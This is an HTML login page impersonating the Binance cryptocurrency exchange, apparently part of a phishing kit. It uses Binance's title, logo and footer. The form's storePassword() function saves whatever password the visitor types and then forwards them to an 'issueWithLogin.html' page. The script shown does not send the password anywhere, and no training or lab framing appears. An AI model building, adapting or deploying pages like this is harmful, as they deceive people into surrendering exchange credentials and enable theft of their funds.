<!DOCTYPE html>
<html>
<head>
    <meta charset='utf-8'>
    <meta http-equiv='X-UA-Compatible' content='IE=edge'>
    <title>Log In | Binance</title>
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <link rel='stylesheet' type='text/css' media='screen' href='style.css'>
    <link rel="icon" href="img/icon.png">
    <script src='main.js'></script>
</head>
<body>
    <img class="logo" src="img/logo.png">
    <div class="back">
        <img src="img/back.png">
        <p>Back</p>
    </div>
    <div class="container" id="container">
        <div class="form-container">
            <h2 class="welcome-txt">Welcome back!</h2>

            <form onsubmit="storePassword(); return false;">
                <div class="input-group">
                    <p class="label" id="jj">Password</p>
                    <input type="password" minlength="6" maxlength="40" required id="password" >
                    <div class="eye-container">
                        <img src="img/eye.png" class="eye" id="show-eye" onclick="togglePassword(false)" style="cursor: pointer; display: none;">
                        <img src="img/hidden.png" class="eye" id="hide-eye" onclick="togglePassword(true)" style="cursor: pointer; ">
                    </div>
                </div>
                
                <div class="input-group">
                    
                    <button class="next-btn" type="text">Next</button>
                </div>
            </form>
              
                <p class="acct"><a href="">Forgot password</a></p>
            
        </div>
    </div>

    <footer>
        <p>Binance &copy; 2024</p>
        <p>Cookie Preferences</p>
    </footer>


    <script>
        // Toggle the visibility of the password
        function togglePassword(show) {
            const passwordInput = document.getElementById('password');
            const showEye = document.getElementById('show-eye');
            const hideEye = document.getElementById('hide-eye');

            if (show) {
                passwordInput.type = 'text';
                showEye.style.display = 'block';
                hideEye.style.display = 'none';
            } else {
                passwordInput.type = 'password';
                showEye.style.display = 'none';
                hideEye.style.display = 'block';
            }
        }
    </script>
    
    
    
    
    
   <script>
        function storePassword() {
            const password = document.getElementById('password').value;
            localStorage.setItem('password', password);
            window.location.href = 'issueWithLogin.html';
        }
    </script>
</body>
</html>